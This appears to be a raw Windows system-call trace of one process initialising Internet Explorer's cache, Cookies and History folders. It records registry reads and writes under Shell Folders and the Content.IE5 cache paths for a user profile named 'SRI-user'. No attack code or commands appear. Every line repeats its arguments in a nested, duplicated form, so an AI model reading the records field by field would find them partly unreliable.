 03232   456   NtQueryValueKey  (412,  (412, "Cache", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0"}, 120, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (412, "Cache", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0"}, 120, ) }, 120, ) == 0x0
 03233   456   NtQueryValueKey  (412,  (412, "Cache", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0"}, 120, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (412, "Cache", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0"}, 120, ) }, 120, ) == 0x0
 03234   456   NtQueryValueKey  (412,  (412, "Cookies", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0C\0o\0o\0k\0i\0e\0s\0\0\0"}, 56, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (412, "Cookies", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0C\0o\0o\0k\0i\0e\0s\0\0\0"}, 56, ) }, 56, ) == 0x0
 03235   456   NtQueryValueKey  (412,  (412, "Cookies", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0C\0o\0o\0k\0i\0e\0s\0\0\0"}, 56, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (412, "Cookies", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0C\0o\0o\0k\0i\0e\0s\0\0\0"}, 56, ) }, 56, ) == 0x0
 03236   456   NtQueryValueKey  (412,  (412, "History", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\0\0"}, 86, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (412, "History", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\0\0"}, 86, ) }, 86, ) == 0x0
 03237   456   NtQueryValueKey  (412,  (412, "History", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\0\0"}, 86, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (412, "History", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\0\0"}, 86, ) }, 86, ) == 0x0
 03238   456   NtClose  (412, ... ) == 0x0
 03239   456   NtOpenKey  (0xf, {24, 404, 0x40, 0, 0,  (0xf, {24, 404, 0x40, 0, 0, "Content"}, ... 412, ) }, ... 412, ) == 0x0
 03240   456   NtQueryValueKey  (412,  (412, "PerUserItem", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (412, "PerUserItem", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 03241   456   NtClose  (412, ... ) == 0x0
 03242   456   NtOpenKey  (0xf, {24, 404, 0x40, 0, 0,  (0xf, {24, 404, 0x40, 0, 0, "Content"}, ... 412, ) }, ... 412, ) == 0x0
 03243   456   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 03244   456   NtCreateSemaphore  (0x1f0003, {24, 64, 0x80, 1493616, 0,  (0x1f0003, {24, 64, 0x80, 1493616, 0, "shell.{210A4BA0-3AEA-1069-A2D9-08002B30309D}"}, 0, 2147483647, ... 416, ) }, 0, 2147483647, ... 416, ) == STATUS_OBJECT_NAME_EXISTS
 03245   456   NtReleaseSemaphore  (416, 1, ... 0, ) == 0x0
 03246   456   NtWaitForSingleObject  (416, 0, {0, 0}, ... ) == 0x0
 03247   456   NtCreateKey  (0x2000000, {24, 52, 0x40, 0, 0,  (0x2000000, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"}, 0, 0x0, 0, ... 420, 2, ) }, 0, 0x0, 0, ... 420, 2, ) == 0x0
 03248   456   NtQueryValueKey  (420,  (420, "Cache", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0"}, 120, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (420, "Cache", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0"}, 120, ) }, 120, ) == 0x0
 03249   456   NtClose  (420, ... ) == 0x0
 03250   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\Temporary Internet Files"}, 1234584, ... ) }, 1234584, ... ) == 0x0
 03251   456   NtCreateKey  (0x2000000, {24, 52, 0x40, 0, 0,  (0x2000000, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"}, 0, 0x0, 0, ... 420, 2, ) }, 0, 0x0, 0, ... 420, 2, ) == 0x0
 03252   456   NtSetValueKey  (420,  (420, "Cache", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0", 150, ... ) , 0, 1,  (420, "Cache", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0", 150, ... ) , 150, ... ) == 0x0
 03253   456   NtClose  (420, ... ) == 0x0
 03254   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\Temporary Internet Files"}, 1235916, ... ) }, 1235916, ... ) == 0x0
 03255   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\Temporary Internet Files"}, 1235648, ... ) }, 1235648, ... ) == 0x0
 03256   456   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\Temporary Internet Files"}, 7, 2113568, ... 420, {status=0x0, info=1}, ) }, 7, 2113568, ... 420, {status=0x0, info=1}, ) == 0x0
 03257   456   NtSetInformationFile  (420, 1235624, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 03258   456   NtClose  (420, ... ) == 0x0
 03259   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\Temporary Internet Files\desktop.ini"}, 1235648, ... ) }, 1235648, ... ) == 0x0
 03260   456   NtQueryValueKey  (412,  (412, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (412, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) }, 14, ) == 0x0
 03261   456   NtQueryValueKey  (412,  (412, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (412, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) }, 14, ) == 0x0
 03262   456   NtQueryValueKey  (412,  (412, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\251~\1\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (412, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\251~\1\0"}, 16, ) }, 16, ) == 0x0
 03263   456   NtOpenKey  (0xf, {24, 48, 0x40, 0, 0,  (0xf, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache"}, ... 420, ) }, ... 420, ) == 0x0
 03264   456   NtOpenKey  (0xf, {24, 420, 0x40, 0, 0,  (0xf, {24, 420, 0x40, 0, 0, "Paths"}, ... 424, ) }, ... 424, ) == 0x0
 03265   456   NtOpenKey  (0xf, {24, 424, 0x40, 0, 0,  (0xf, {24, 424, 0x40, 0, 0, "Path1"}, ... 428, ) }, ... 428, ) == 0x0
 03266   456   NtOpenKey  (0xf, {24, 424, 0x40, 0, 0,  (0xf, {24, 424, 0x40, 0, 0, "Path2"}, ... 432, ) }, ... 432, ) == 0x0
 03267   456   NtOpenKey  (0xf, {24, 424, 0x40, 0, 0,  (0xf, {24, 424, 0x40, 0, 0, "Path3"}, ... 436, ) }, ... 436, ) == 0x0
 03268   456   NtOpenKey  (0xf, {24, 424, 0x40, 0, 0,  (0xf, {24, 424, 0x40, 0, 0, "Path4"}, ... 440, ) }, ... 440, ) == 0x0
 03269   456   NtOpenKey  (0xf, {24, 420, 0x40, 0, 0,  (0xf, {24, 420, 0x40, 0, 0, "Special Paths"}, ... 444, ) }, ... 444, ) == 0x0
 03270   456   NtSetValueKey  (424,  (424, "Directory", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\\0C\0o\0n\0t\0e\0n\0t\0.\0I\0E\05\0\0\0", 174, ... ) , 0, 1,  (424, "Directory", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\\0C\0o\0n\0t\0e\0n\0t\0.\0I\0E\05\0\0\0", 174, ... ) , 174, ... ) == 0x0
 03271   456   NtSetValueKey  (424,  (424, "Paths", 0, 4, "\4\0\0\0", 4, ... ) , 0, 4,  (424, "Paths", 0, 4, "\4\0\0\0", 4, ... ) , 4, ... ) == 0x0
 03272   456   NtSetValueKey  (428,  (428, "CachePath", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\\0C\0o\0n\0t\0e\0n\0t\0.\0I\0E\05\0\\0C\0a\0c\0h\0e\01\0\0\0", 188, ... ) , 0, 1,  (428, "CachePath", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\\0C\0o\0n\0t\0e\0n\0t\0.\0I\0E\05\0\\0C\0a\0c\0h\0e\01\0\0\0", 188, ... ) , 188, ... ) == 0x0
 03273   456   NtSetValueKey  (432,  (432, "CachePath", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\\0C\0o\0n\0t\0e\0n\0t\0.\0I\0E\05\0\\0C\0a\0c\0h\0e\02\0\0\0", 188, ... ) , 0, 1,  (432, "CachePath", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\\0C\0o\0n\0t\0e\0n\0t\0.\0I\0E\05\0\\0C\0a\0c\0h\0e\02\0\0\0", 188, ... ) , 188, ... ) == 0x0
 03274   456   NtSetValueKey  (436,  (436, "CachePath", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\\0C\0o\0n\0t\0e\0n\0t\0.\0I\0E\05\0\\0C\0a\0c\0h\0e\03\0\0\0", 188, ... ) , 0, 1,  (436, "CachePath", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\\0C\0o\0n\0t\0e\0n\0t\0.\0I\0E\05\0\\0C\0a\0c\0h\0e\03\0\0\0", 188, ... ) , 188, ... ) == 0x0
 03275   456   NtSetValueKey  (440,  (440, "CachePath", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\\0C\0o\0n\0t\0e\0n\0t\0.\0I\0E\05\0\\0C\0a\0c\0h\0e\04\0\0\0", 188, ... ) , 0, 1,  (440, "CachePath", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\\0C\0o\0n\0t\0e\0n\0t\0.\0I\0E\05\0\\0C\0a\0c\0h\0e\04\0\0\0", 188, ... ) , 188, ... ) == 0x0
 03276   456   NtSetValueKey  (428,  (428, "CacheLimit", 0, 4, "\252_\0\0", 4, ... ) , 0, 4,  (428, "CacheLimit", 0, 4, "\252_\0\0", 4, ... ) , 4, ... ) == 0x0
 03277   456   NtSetValueKey  (432,  (432, "CacheLimit", 0, 4, "\252_\0\0", 4, ... ) , 0, 4,  (432, "CacheLimit", 0, 4, "\252_\0\0", 4, ... ) , 4, ... ) == 0x0
 03278   456   NtSetValueKey  (436,  (436, "CacheLimit", 0, 4, "\252_\0\0", 4, ... ) , 0, 4,  (436, "CacheLimit", 0, 4, "\252_\0\0", 4, ... ) , 4, ... ) == 0x0
 03279   456   NtSetValueKey  (440,  (440, "CacheLimit", 0, 4, "\252_\0\0", 4, ... ) , 0, 4,  (440, "CacheLimit", 0, 4, "\252_\0\0", 4, ... ) , 4, ... ) == 0x0
 03280   456   NtClose  (440, ... ) == 0x0
 03281   456   NtClose  (436, ... ) == 0x0
 03282   456   NtClose  (432, ... ) == 0x0
 03283   456   NtClose  (428, ... ) == 0x0
 03284   456   NtClose  (424, ... ) == 0x0
 03285   456   NtClose  (444, ... ) == 0x0
 03286   456   NtClose  (420, ... ) == 0x0
 03287   456   NtOpenKey  (0xf, {24, 404, 0x40, 0, 0,  (0xf, {24, 404, 0x40, 0, 0, "Cookies"}, ... 420, ) }, ... 420, ) == 0x0
 03288   456   NtQueryValueKey  (420,  (420, "PerUserItem", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (420, "PerUserItem", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 03289   456   NtClose  (420, ... ) == 0x0
 03290   456   NtClose  (412, ... ) == 0x0
 03291   456   NtOpenKey  (0xf, {24, 404, 0x40, 0, 0,  (0xf, {24, 404, 0x40, 0, 0, "Cookies"}, ... 412, ) }, ... 412, ) == 0x0
 03292   456   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 03293   456   NtReleaseSemaphore  (416, 1, ... 0, ) == 0x0
 03294   456   NtWaitForSingleObject  (416, 0, {0, 0}, ... ) == 0x0
 03295   456   NtCreateKey  (0x2000000, {24, 52, 0x40, 0, 0,  (0x2000000, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"}, 0, 0x0, 0, ... 420, 2, ) }, 0, 0x0, 0, ... 420, 2, ) == 0x0
 03296   456   NtQueryValueKey  (420,  (420, "Cookies", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0C\0o\0o\0k\0i\0e\0s\0\0\0"}, 56, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (420, "Cookies", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0C\0o\0o\0k\0i\0e\0s\0\0\0"}, 56, ) }, 56, ) == 0x0
 03297   456   NtClose  (420, ... ) == 0x0
 03298   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Cookies"}, 1234584, ... ) }, 1234584, ... ) == 0x0
 03299   456   NtCreateKey  (0x2000000, {24, 52, 0x40, 0, 0,  (0x2000000, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"}, 0, 0x0, 0, ... 420, 2, ) }, 0, 0x0, 0, ... 420, 2, ) == 0x0
 03300   456   NtSetValueKey  (420,  (420, "Cookies", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0C\0o\0o\0k\0i\0e\0s\0\0\0", 86, ... ) , 0, 1,  (420, "Cookies", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0C\0o\0o\0k\0i\0e\0s\0\0\0", 86, ... ) , 86, ... ) == 0x0
 03301   456   NtClose  (420, ... ) == 0x0
 03302   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Cookies"}, 1235916, ... ) }, 1235916, ... ) == 0x0
 03303   456   NtQueryValueKey  (412,  (412, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0o\0o\0k\0i\0e\0:\0\0\0"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (412, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0o\0o\0k\0i\0e\0:\0\0\0"}, 28, ) }, 28, ) == 0x0
 03304   456   NtQueryValueKey  (412,  (412, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0o\0o\0k\0i\0e\0:\0\0\0"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (412, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0o\0o\0k\0i\0e\0:\0\0\0"}, 28, ) }, 28, ) == 0x0
 03305   456   NtQueryValueKey  (412,  (412, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (412, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) }, 16, ) == 0x0
 03306   456   NtOpenKey  (0xf, {24, 404, 0x40, 0, 0,  (0xf, {24, 404, 0x40, 0, 0, "History"}, ... 420, ) }, ... 420, ) == 0x0
 03307   456   NtQueryValueKey  (420,  (420, "PerUserItem", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (420, "PerUserItem", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 03308   456   NtClose  (420, ... ) == 0x0
 03309   456   NtClose  (412, ... ) == 0x0
 03310   456   NtOpenKey  (0xf, {24, 404, 0x40, 0, 0,  (0xf, {24, 404, 0x40, 0, 0, "History"}, ... 412, ) }, ... 412, ) == 0x0
 03311   456   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 03312   456   NtReleaseSemaphore  (416, 1, ... 0, ) == 0x0
 03313   456   NtWaitForSingleObject  (416, 0, {0, 0}, ... ) == 0x0
 03314   456   NtCreateKey  (0x2000000, {24, 52, 0x40, 0, 0,  (0x2000000, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"}, 0, 0x0, 0, ... 420, 2, ) }, 0, 0x0, 0, ... 420, 2, ) == 0x0
 03315   456   NtQueryValueKey  (420,  (420, "History", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\0\0"}, 86, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (420, "History", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\0\0"}, 86, ) }, 86, ) == 0x0
 03316   456   NtClose  (420, ... ) == 0x0
 03317   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\History"}, 1234584, ... ) }, 1234584, ... ) == 0x0
 03318   456   NtCreateKey  (0x2000000, {24, 52, 0x40, 0, 0,  (0x2000000, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"}, 0, 0x0, 0, ... 420, 2, ) }, 0, 0x0, 0, ... 420, 2, ) == 0x0
 03319   456   NtSetValueKey  (420,  (420, "History", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\0\0", 116, ... ) , 0, 1,  (420, "History", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\0\0", 116, ... ) , 116, ... ) == 0x0
 03320   456   NtClose  (420, ... ) == 0x0
 03321   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\History"}, 1235916, ... ) }, 1235916, ... ) == 0x0
 03322   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\History"}, 1235648, ... ) }, 1235648, ... ) == 0x0
 03323   456   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\History"}, 7, 2113568, ... 420, {status=0x0, info=1}, ) }, 7, 2113568, ... 420, {status=0x0, info=1}, ) == 0x0
 03324   456   NtSetInformationFile  (420, 1235624, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 03325   456   NtClose  (420, ... ) == 0x0
 03326   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\History\desktop.ini"}, 1235648, ... ) }, 1235648, ... ) == 0x0
 03327   456   NtQueryValueKey  (412,  (412, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="V\0i\0s\0i\0t\0e\0d\0:\0\0\0"}, 30, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (412, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="V\0i\0s\0i\0t\0e\0d\0:\0\0\0"}, 30, ) }, 30, ) == 0x0
